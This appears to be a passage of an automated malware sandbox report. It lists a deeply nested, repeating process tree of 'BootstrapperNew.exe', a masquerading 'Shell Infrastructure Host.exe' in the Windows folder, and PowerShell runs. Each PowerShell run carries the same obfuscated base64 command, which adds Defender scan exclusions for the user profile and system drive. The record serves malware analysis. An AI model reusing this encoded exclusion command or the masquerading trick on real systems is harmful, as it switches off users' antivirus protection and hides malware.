        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        88⤵
        
        PID:5556
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        88⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        88⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        89⤵
        
        PID:6220
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        89⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        89⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        90⤵
        
        PID:7104
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        90⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        90⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        91⤵
        
        PID:5356
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        91⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        91⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        92⤵
        
        PID:4832
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        92⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        92⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        93⤵
        
        PID:968
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        93⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        93⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        94⤵
        
        PID:4184
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        94⤵
        
        PID:5860
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        94⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        95⤵
        
        PID:2016
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        95⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        95⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        96⤵
        
        PID:6188
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        96⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        96⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        97⤵
        
        PID:5076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        97⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        97⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        98⤵
        
        PID:5644
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        98⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        98⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        99⤵
        
        PID:6960
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        99⤵
        
        PID:6568
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        99⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        100⤵
        
        PID:5480
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        101⤵
        
        PID:1844
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        100⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        100⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        101⤵
        
        PID:1676
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        101⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        101⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        102⤵
        
        PID:3696
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        102⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        102⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        103⤵
        
        PID:6956
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        103⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        103⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        104⤵
        
        PID:448
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        104⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        104⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        105⤵
        
        PID:6852
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        105⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        105⤵
        
        PID:6196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        106⤵
        
        PID:232
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        106⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        106⤵
        
        PID:1832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        107⤵
        
        PID:6808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:1036
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        107⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        107⤵
        
        PID:3456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        108⤵
        
        PID:6568
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        108⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        108⤵
        
        PID:1876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        109⤵
        
        PID:5968
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        109⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        109⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        110⤵
        
        PID:3312
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        110⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        110⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        111⤵
        
        PID:6436
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        111⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        111⤵
        
        PID:1216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        112⤵
        
        PID:2384
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        112⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        112⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        113⤵
        
        PID:5004
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        113⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        113⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        114⤵
        
        PID:3160
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        114⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        114⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        115⤵
        
        PID:3108
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        115⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        115⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
